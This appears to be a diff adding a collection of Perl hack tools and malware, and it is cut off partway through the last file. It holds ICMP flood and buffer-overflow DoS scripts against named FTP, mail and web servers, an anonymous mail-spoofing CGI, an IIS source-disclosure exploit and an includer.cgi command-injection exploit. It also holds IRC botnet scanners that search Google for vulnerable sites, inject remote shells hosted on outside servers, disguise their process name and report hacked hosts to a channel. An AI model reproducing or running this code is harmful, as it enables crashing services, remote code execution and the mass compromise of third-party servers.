$data .= chr(int rand(255)),$i-- while($i);
$icmp = new Net::RawIP({
ip => {
ihl => 6,
tot_len => 1024,
id => 1,
ttl => 255,
frag_off => 0,
daddr => $opt_t
},
icmp => {
id => 2650,
data => $data
}
});
$j++;
$icmp->set({
ip => { saddr => 17000000 + int rand 4261000000 },
icmp => {
type => int rand(14),
code => int rand(10),
sequence => int rand(255)
}
});
$icmp->send;
print "Linux-DoS sent...\n"
# print "[b00m] " unless $j%1000;

240
Perl/DoS.Perl.Tedla Normal file
View File

@ -0,0 +1,240 @@
#####################################################################
# Rewted Network Security Labs - www.rewted.org #
# based upon advisories by USSR (www.ussrback.com) & Rewted.org #
# #
# Demonstration script to remotely overflow various server buffers, #
# resulting in a denial of service, for TESTING purposes only. #
# Runs on *nix & Windows with perl. #
# #
# G6 FTP Server v2.0 beta4/5 #
# MDaemon httpd Server v2.8.5.0 #
# Avirt Mail Server v3.5 #
# BisonWare FTP Server v3.5 #
# Vermillion FTP Server v1.23 #
# ZetaMail POP3 Server v2.1 #
# WFTPD FTP Server 2.40 #
# BFTelnet Server v1.1 #
# Broker FTP Server v3.5 #
# ExpressFS FTP server v2.x #
# XtraMail POP3 Server v1.11 #
# Cmail SMTP Server v2.4 #
# PakMail SMTP/POP3 v1.25 #
# #
# slackette - warminx@null.rewted.org #
# www.rewted.org www.rewted.org www.rewted.org www.rewted.org #
#####################################################################
use IO::Socket;
use Getopt::Std;
getopts('h:p:t:u:v', \%args);
if(!defined($args{h}) && !defined($args{t})) {
print qq~Usage: $0 -h <victim> -t <number> ((-u username) | (-p password)) | -v
-h victim to test remote overflow DoS on
-t server type (check the -v option for list)
-u username authorisation (required if server prompts for username)
-p password authentication (required if user/passwd is expected)
-v lists all servers vulnerable to each DoS
~; exit; }
if(defined($args{u})) { $user=$args{u}; }
if(defined($args{p})) { $pass=$args{p}; }
if(defined($args{v})) { &vulnerable; }
if(defined($args{h}) && defined($args{t})){
if(($args{t}) == 1) { &G6; }
if(($args{t}) == 2) { &mdaemon; }
if(($args{t}) == 3) { &avirt; }
if(($args{t}) == 4) { &bisonware; }
if(($args{t}) == 5) { &vermillion; }
if(($args{t}) == 6) { &zetamail; }
if(($args{t}) == 7) { &wftpd; }
if(($args{t}) == 8) { &bftelnet; }
if(($args{t}) == 9) { &broker; }
if(($args{t}) == 10) { &expressfs; }
if(($args{t}) == 11) { &xtramail; }
if(($args{t}) == 12) { &cmail; }
if(($args{t}) == 13) { &pakmail; }
if(($args{t}) == 14) { &pakpop; }}
sub G6 {
$denial .= "A" x 2000;
$victim=$args{h};
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
$socket->autoflush(1);
print $socket "$denial\n"; # user
print "\nSent overflow to $victim\n";
close $socket; }
sub mdaemon {
$victim=$args{h};
$denial .= "A" x 1025;
$url = "/$denial";
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "80") or die "Can't connect.\n";
print $socket "GET $url\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub avirt {
$victim=$args{h};
$denial .= "A" x 856;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect\n";
$socket->autoflush(1);
print $socket "user $user\n";
print $socket "pass $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub bisonware {
$victim=$args{h};
$denial .= "A" x 2000;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect\n";
$socket->autoflush(1);
print $socket "$denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub vermillion {
$victim=$args{h};
$denial .= "A" x 504;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect\n";
$socket->autoflush(1);
print $socket "$user\n";
print $socket "$pass\n";
print $socket "cwd $denial\n";
# for(i=0; i<=3; i++) { print $socket "CWD $denial\n"; }
print "\nSent overflow to $victim\n";
close $socket; }
sub zetamail {
$victim=$args{h};
$denial .= "A" x 3500;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "110") or die "Can't connect.\n";
print $socket "user $denial\n";
print $socket "pass $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub wftpd {
$victim=$args{h};
$denial .= "A" x 255;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
print $socket "$user\n";
print $socket "$pass\n";
print $socket "MKDIR $denial\n";
print $socket "CWD $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub bftelnet {
# use Net::Telnet;
$victim=$args{h};
$denial .= "A" x 3090;
$telnet = new Net::Telnet ( Timeout =>10,
Errmode =>'die');
$telnet->open('$victim');
$telnet->waitfor('/Login: $/i');
$telnet->print('$denial');
print "\nSent overflow to $victim\n";
close $telnet; }
sub broker {
$victim=$args{h};
$denial .= "A" x 2730;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
print $socket "$denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub expressfs {
$victim=$args{h};
$denial .= "A" x 654;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
print $socket "$denial\n";
print $socket "AAAAAAAAAAAAAAAAAAA\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub xtramail {
$victim=$args{h};
$denial .= "A" x 2930;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.\n";
print $socket "MAIL FROM: test\@localhost\n";
print $socket "RCPT TO: $denial\@localhost\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub cmail {
$victim=$args{h};
$denial .= "A" x 7090;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.\n";
print $socket "MAIL FROM: $denial\@localhost\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub pakmail {
$victim=$args{h};
$denial .= "A" x 1390;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.\n";
print $socket "MAIL FROM: test\@localhost\n";
print $socket "RCPT TO: $denial\@localhost\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub pakpop {
$victim=$args{h};
$denial .= "A" x 1400;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "110") or die "Can't connect.\n";
print $socket "user test\n";
print $socket "pass $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub vulnerable {
print qq~
______________________________________________________________________________
Vulnerable Daemon Version Vulnerable Daemon Version
______________________________________________________________________________
[1] G6 FTP Server v2.0b4/5 [2] MDaemon httpd Server v2.8.5.0
[3] Avirt Mail Server v3.5 [4] BisonWare FTP Server v3.5
[5] Vermillion FTP Server v1.23 [6] ZetaMail SMTP Server v2.1
[7] WFTPD FTP Server v2.40 [8] BFTelnet Server v1.1
[9] Broker FTP Server v3.5 [10] ExpressFS FTP Server v2.x
[11] XtraMail POP3 Server v1.11 [12] Cmail SMTP Server v2.4
[13] PakMail SMTP Server v1.25 [14] PakMail POP3 Server v1.25
~; exit; }

50
Perl/DoS.Perl.Vftp Normal file
View File

@ -0,0 +1,50 @@
# Example for a possible DOS-attack against Vermillion FTP Daemon (VFTPD) v1.23.
# There need to be 504 characters to overflow Server.
# Example : Trying example.com...
# Connected to example.com.
# Escape character is '^]'.
# 220 itsme FTP Server (vftpd 1.23) ready.
# USER itsme
# PASS ******
# CWD [504 characters]
# CWD [504 characters]
# CWD [504 characters]
# Overflow
use IO::Socket;
print "Possible DOS-attack against Vermillion FTP Daemon (VFTPD) v1.23\n";
print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
if (not $ARGV[2]) {
print "Usage: $0 [host] [user] [pass]\n\n";
exit(0);
}
sub connecthost {
$host = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $ARGV[0],
PeerPort => "21",) or die "Can't open connection to $ARGV[0] because $!\n";
$host->autoflush(1);
}
$bufferoverflow .= "A" x 504;
print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "user $ARGV[1]\n";
print $host "pass $ARGV[2]\n";
print $host "cwd $bufferoverflow\n";
print $host "cwd $bufferoverflow\n";
print $host "cwd $bufferoverflow\n";
print "close connection...\n";
close $host;
print "\nTesting...\n";
&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n");
close $host;
die "The host $ARGV[0] is not vulnerable to this attack.\n";
# by arbon(arbon@gmx.de)

71
Perl/DoS.Perl.Vqserver Normal file
View File

@ -0,0 +1,71 @@
DHC Advisory
Advisory for vqServer 1.4.49
vqServer is made by vqSoft. Site: http://www.vqsoft.com
by nemesystm of the DHC
(http://dhcorp.cjb.net - auto45040@hushmail.com)
/-|=[explaination]=|-\
When sending vqServer version 1.4.49 a malformed URL request it will crash
the service. This has been verified to work on the Windows version, but
it probably is in the linux/unix version and prior versions too.
/-|=[testing it]=|-\
To test this vulnerability, send a GET request with 65000 characters.
So:
GET /AAA (hit return =)
Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste
that much characters in their browser fields (www.server.com/AAA) you will
have to use something like Telnet.
You can easily program something to print 65000 chars in Perl:
open (OUT, ">$ARGV[0]");
print OUT ("GET /");
print OUT ("A" x 65000);
then it's just a cut and paste.
Or you can use the example code below
/-|=[fix]=|-\
the latest edition of vqServer (1.9.47) is unaffected by this. It is available
for download at www.vqsoft.com
/-|=[notes]=|-\
PUT, POST and the Administration port do not seem to be affected by a high
amount of characters. The Windows version needed a reinstall every five
or so crashes. A reboot or total shutdown did not help.
/-|=[exploit code]=|-\
sinfony quickly wrote some code so you can see if you're vulnerable.
# DoS exploit for vqServer 1.4.49
# This vulnerability was discovered by nemesystm
# (auto45040@hushmail.com)
#
# code by: sinfony (chinesef00d@hotmail.com)
# [confess.sins.labs] (http://www.ro0t.nu/csl)
# and DHC member
#
# kiddie quote of the year:
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it
die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
usage: $0 <host> \n"
if $#ARGV != 0;
use IO::Socket;
$host = $ARGV[0];
$port = 80;
print "Connecting to $host on port $port...\n";
$suck = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "$host isnt a webserver you schmuck.\n";
$a = A;
$send = $a x 65000;
print "Connected, sending exploit.\n";
print $suck "GET /$send\n";
sleep(3);
print "Exploit sent. vqServer should be dead.\n";
close($suck)

101
Perl/HackTool.Perl.AnonyMail Normal file
View File

@ -0,0 +1,101 @@
# anonymail - fuck, i was bored like shit. napalmed.
$script_url = "/am.cgi";
$sendmail = "/usr/sbin/sendmail";
@referers = ("");
$admin = "napalmed@fuck.au";
@friends = ("");
$good_refer = 0;
if($ENV{REQUEST_METHOD} eq 'GET')
{
&print_form;
}
elsif($ENV{REQUEST_METHOD} eq 'POST')
{
foreach $referer(@referers)
{
if($ENV{HTTP_REFERER} =~ /$referer/i) { $good_refer = 1; }
}
if($good_refer != 1) { &error; }
&parse_form;
&send_mail;
}
else
{
&error;
}
sub print_form
{
print "Content-type: text/html\n\n";
print "<HTML><HEAD><TITLE>jhve elohim meth :: god is dead</TITLE></HEAD>\n";
print "<BODY><B> ANONYMOUS MAIL. FUCK YOU </B><BR>\n";
print "
<CENTER>
<FORM ACTION=\"$script_url\" METHOD=\"POST\" NAME=\"mail_form\">
<TABLE BORDER=5><TH COLSPAN=2>BITCH</TH>
<tr><td>Send To:</td><td><INPUT TYPE=\"text\" NAME=\"to\" SIZE=30></td></tr>
<tr><td>From Address:</td><td><INPUT TYPE=\"text\" NAME=\"from_addy\" SIZE=30></td></tr>
<tr><td>From Name:</td><td><INPUT TYPE=\"text\" NAME=\"from_name\" SIZE=30></td></tr>
<tr><td>Subject:</td><td><INPUT TYPE=\"text\" NAME=\"subject\" SIZE=30></td></tr>
<tr><td colspan=2>Body:<br><TEXTAREA NAME=\"body\" WRAP=VIRTUAL ROWS=3 COLS=35></TEXTAREA></td></tr>
<tr><td colspan=2 align=center><INPUT TYPE=\"submit\" VALUE=\" Send Mail \">
<INPUT TYPE=\"reset\" VALUE=\" Clear \"></TD></TR></TABLE></FORM></CENTER>\n";
print "<BR><HR><BR></BODY></HTML>\n";
exit;
}
sub send_mail
{
open (MAIL, "|$sendmail -t") || &error;
print MAIL "From: $input{'from_name'} \<$input{'from_addy'}\>\n";
print MAIL "Reply-To: $input{'from_addy'}\n";
print MAIL "X-Mailer: anonmail.bitch\n";
print MAIL "To: $input{'to'}\n";
print MAIL "Subject: $input{'subject'}\n";
print MAIL "Content-Type: text/plain; charset=us-ascii\n";
print MAIL "Content-Transfer-Encoding: 7bit\n\n";
print MAIL "$input{'body'}";
close (MAIL);
print "Content-type: text/html\n\n";
print "Below is what you sent to $input{to}\n<pre>\n";
print "From: $input{'from_name'} \<$input{'from_addy'}\>\n";
print "Reply-To: $input{'from_addy'}\n";
print "To: $input{'to'}\n";
print "Subject: $input{'subject'}\n\n";
print "$input{'body'}";
exit;
}
sub parse_form {
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
if (length($buffer) < 5) {
$buffer = $ENV{QUERY_STRING};
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/<!--(.|\n)*-->//g;
$input{$name} = $value;
}
if($input{'to'} =~ /microsoft.com/i) { &error; }
foreach $friend(@friends)
{
if($input{'to'} =~ /$friend/i) { &error; }
}
}
sub error
{
print "Content-type: text/html\n\n";
print "<BR>An error occured while processing the script.\n";
exit;
}

85
Perl/HackTool.Perl.Aspviewer Normal file
View File

@ -0,0 +1,85 @@
#----------------------------------------------------------------#
# [ISMyASP] #
# IIS ASP source code viewer using ISM.DLL buffer truncation bug #
# and null.htw bug #
# LoWNOISE Colombia 5/2000 #
# Efrain 'ET' Torres et@cyberspace.org #
#----------------------------------------------------------------#
# Shoutz 2 f4lc0n & M43ztr0 <-- a gnu memb. #
#----------------------------------------------------------------#
# Some f() from wwwboard.pl by S.Sparling #
#----------------------------------------------------------------#
use Socket;
$port=80;
if (!($ARGV[0])) {
print "\n[ISMyASP]\n";
print "$0 http://host/view.asp \n";
print "ET LoWNOISE Colombia.\n";
exit;
}
$url=$ARGV[0];
chop($url) if $url =~ /\n$/;
print "url: $url\n";
$remote = $url;
$remote =~ s/http\:\/\///g;
$remote =~ s/\/([^>]|\n)*//g;
print "host: $remote\n";
$path = $url;
$path =~ s/http\:\/\///g;
$path =~ s/$remote//g;
print "path: $path\n";
$spaces=230; #THIS IS THE DEFAULT VALUE FOR ISM.DLL b.t
#REMEMBER THIS ATTACK ONLY WORKS ONLY 1 TIME
#READ THE CERBERUS CISADV000327.
$submit = "GET $path";
$i=0;
while($i < $spaces)
{
$submit= "$submit%20";
$i++;
}
$submit= "$submit.htr HTTP/1.0\n\n";
print "======Trying ism.dll buffer truncation...\n";
print "submit: $submit\n\n";
&post_message;
print "======Trying null.htw...\n";
$submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n";
print "submit: $submit\n\n";
&post_message;
sub post_message
{
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
die("No port specified.") unless $port;
$iaddr = inet_aton($remote) || die("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
connect(SOCK, $paddr) || die("Unable to connect: $!");
send(SOCK,$submit,0);
printf "\n======Waiting for reply [pray]....\n\n";
while(<SOCK>) {
print $_;
}
close(SOCK);
}
print "\n\n======THE END. [LoWNOISE]\n";
exit;
#:) narco.guerrilla&gov.sucks.co (huge :x to PO-K)

85
Perl/HackTool.Perl.Cgiluder.b Normal file
View File

@ -0,0 +1,85 @@
#
# [K-C0d3r] Includer.cgi 1.0 remote command execution [K-C0d3r]
#
# C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend!
#
# I think the bug was discovered by Francisco Alisson.
#
# Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm.
#
# F**K o*f to all RxBot kiddies as e*****t, G***n, d***b.
#
##########################################################################
# [kc@K-C0d3r xpl]$ perl KCincluder.pl 127.0.0.1 /cgi-bin/includer.cgi 1
# [K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]
# [?] Insert command: id
# [+] Conecting to 127.0.0.1
# [+] Connected to 127.0.0.1
# [+] Injecting command ...
# uid=500(kc) gid=500(kc) gruppi=500(kc)
# [kc@K-C0d3r xpl]$
##########################################################################
use IO::Socket;
sub Usage {
print STDERR "Usage:\nKCinc-xpl.pl <www.victim.com> </path/to/includer.cgi> <exploitation_type>.\n";
print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n";
exit;
}
if (@ARGV < 3)
{
Usage();
}
$host = @ARGV[0];
$path = @ARGV[1];
print "[K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]\n";
print "[?] Insert command: ";
$command = <STDIN>;
$type = @ARGV[2];
if ($type > 2)
{
Usage();
}
print "[+] Conecting to $host\n";
if ($type = 1)
{
$injection = "$host$path?|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
print $_;
exit;
}
}
if ($type = 2)
{
$injection = "$host$path?template=|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
print $_;
exit;
}
}

248
Perl/HackTool.Perl.IrBot.c Normal file
View File

@ -0,0 +1,248 @@
#################################################################################################################################################
#
# RFi Scanner 2007 by Morgan..
#
# <@Morgan> !scan page.php?id= "Powered by RGameScript"
# <NewScan_Google> [Scan] Started: page.php?id= - Dork: "Powered by RGameScript" Engine: Google
# <NewScan_Google> [Scan] Google Found: 1656 Sites!
# <NewScan_Google> [Scan] Cleaned results: 36 Sites!
# <NewScan_Google> [Scan] Exploting started!
# <NewScan_Google> [SafeON] [Sys Linux] [Free 36.55 GB ] http://gry.nakazdytemat.pl/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?
# <NewScan_Google> [Information] Linux blackhawk.avx.pl 2.6.19.2 #4 SMP Fri Feb 2 11:51:02 CET 2007 i686
# <NewScan_Google> [SafeOFF] [Sys Linux] [Free 26.26 GB ] http://allgamesallfree.org/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?
# <NewScan_Google> [Information] Linux games.allgamesallfree.com 2.6.9-55.0.2.ELsmp #1 SMP Tue Jun 26 14:30:58 EDT 2007 i686
# <NewScan_Google> [Scan] Scan Finished "Powered by RGameScript"
#
#
# Enjoy!
# /Morgan
#
# irc.realworm.net - #Morgan
#################################################################################################################################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
###############CONFIGURATION###################
my $processo = "/usr/local/apache/bin/nscan -DSSL";
my $printcmd="http://www.animedinasty.org/cmd/info.jpg?"; #<---- Change this for your CMD
my $server="irc.x-reaction.net";
my $porta="6667";
my $nick="x____H264____x";
my $chan="#a";
###############END OF CONFIGURATION############
my $verbot = "2.0";
my $cmd="http://www.greenkorea.ph/bbs/data/_metal/safe.txt?"; #Never change this
my $pid=fork;
exit if $pid;
$0="$processo"."\0"x16;
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER Google 8 * : Google : google@google.it : Google :Google\r\n";
print $sk "JOIN $chan\r\n";
print $sk "PRIVMSG $chan :3,1[9S3,1can-Bot] Scan is 3ON1 : 9!scan <bug> <dork>\r\n";
while($line = <$sk>){
$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/)
{
print "PONG :$1";
print $sk "PONG :$1";
}
if ($line=~ /PRIVMSG $chan :.deletebot/){
stampa($sk, "QUIT");
}
if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my ($type,$space);
my %hosts;
stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Started:9 $bug 3 Dork:9 $dork 3Engine:9 Google ");
my @glist=&google($dork);
stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Google Found:9 ".scalar(@glist)."3 Sites!");
push(my @tot, @glist);
my @puliti=&unici(@tot);
stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Cleaned results: 9 ".scalar(@puliti)."3 Sites!");
stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Exploting started! ");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
}
if ($contatore==$uni-1){
stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Scan Finished9 $dork");
}
my $test="http://".$sito.$bug.$cmd."?";
my $print="http://".$sito.$bug.$printcmd."?";
my $vuln="http://".$sito.$bug."";
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /31337/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :3,1[9S3afe9OFF3] 3,1[9S3ys9 ".$type."3] 3,1[9F3ree9 ".$space." 9] $print ");
stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]9 $ker  ");
checksafemode("$print");}}
elsif($re =~ /31337/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :3,1[9S3afe14ON3] 3,1[9S3ys14 ".$type."3] 3,1[9F3ree14 ".$space." 3]14 $print ");
stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]14 $ker  ");
checksafemode("$print");}}
}}}
exit;
}}}
sub stampa()
{
if ($#_ == '1') {
my $sk = $_[0];
print $sk "$_[1]\n";
} else {
print $sk "$_[0]\n";
}}
sub os(){
my $sito=$_[0];
my $Res=query($sito);
my $type;
my $space;
my $ker;
my $str;
while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
$type=$1;
}
while($Res=~m/<br>Kernel:(.+?)\<br>/g){
$ker=$1;
}
while($Res=~m/<br>Free:(.+?)\<br>/g){
$space=$1;
}
$str=$type.",".$space.",".$ker;
return $str;
}
sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=100){
my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}
sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}
sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}
sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
sub checksafemode($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"tckct.co.uk",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET /logfiles/CDPW3U1032/safe.php?url=$query HTTP/1.0\r\nHost: tckct.co.uk\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
}
sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}

438
Perl/HackTool.Perl.IrBot.d Normal file
View File

@ -0,0 +1,438 @@
#Mic22 Is Here!
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
my $processo = "/usr/local/apache/bin/httpd -DSSL";
my $cmd="http://by-gardenfox.t35.com/c99.txt?";
my $server="irc.milw0rm.com";
my $porta="6667";
my $nick="[ScaN-RoX]";
my $canale="#army";
my $verbot = "6.51";
my @adms=("joiner");
my $pid=fork;
exit if $pid;
$0="$processo"."\0"x16;
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER Shinchi 13 * : henca : henca@prohosts.org : Shinchi :henca\r\n";
print $sk "JOIN $canale\r\n";
while($line = <$sk>){
$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/)
{
print "PONG :$1";
print $sk "PONG :$1";
}
if ($line=~ /PRIVMSG $canale :.out/){
stampa($sk, "QUIT");
}
if ($line=~ /PRIVMSG $canale :.help/){
stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 6Scanner RFI Ver $verbot (C)Mic22 , 3Color By 10Shinchi12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2ketik 4.scan Bug Dork 12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.engine 2Untuk melihat searce engine yang digunakan 12::.");
stampa($sk, "PRIVMSG $canale :12.::[13bantuan] 2Ketik 7.mwultimi 2Untuk Melihat Bug di milworm 12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.info 2Untuk Melihat status Bot/System 12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.out 2Untuk Matikan Bot 12::.");
}
if ($line=~ /PRIVMSG $canale :.info/){
my $sysos = `uname -sr`;
my $uptime = `uptime`;
if ($sysos =~ /freebsd/i ) {
$sysname = `hostname`;
$memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
$swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
chomp($memory);
chomp($swap);
}
elsif ( $sysos =~ /linux/i ) {
$sysname = `hostname -f`;
$memory = `free -m |grep -i mem | awk '{print \$2}'`;
$swap = `free -m |grep -i swap | awk '{print \$2}'`;
chomp($swap);
chomp($memory);
}
else {
$sysname ="No Found";;
$memory ="No found";
$swap ="No Found";
}
$uptime=~s/\n//g;
$sysname=~s/\n//g;
$sysos=~s/\n//g;
stampa($sk, "PRIVMSG $canale :12.::[13Info] Server: $server :| - $porta12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Info] SO/Hostname:12 $sysos - $sysname12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Info] Process/PID:12 $processo - $$12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Info] Uptime:12 $uptime12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Info] Memory/Swap:12 $memory - $swap12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Info] Perl Version/BOT:12 $] - $verbot12::.");
}
if ($line=~ /PRIVMSG $canale :.engine/){
stampa($sk, "PRIVMSG $canale :12.::[13Engine] 2Google, Yahoo, MsN, Altavista, Libero, AllTheWeb, AsK, UoL, AoL 12::.");
}
if ($line=~ /PRIVMSG $canale :.mwultimi/){
my @ltt=();
my @bug=();
my $x;
my $page="";
my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$socke>;
$page="@r";
close($socke);
while ($page =~ m/<title>(.*)</g){
$x = $1;
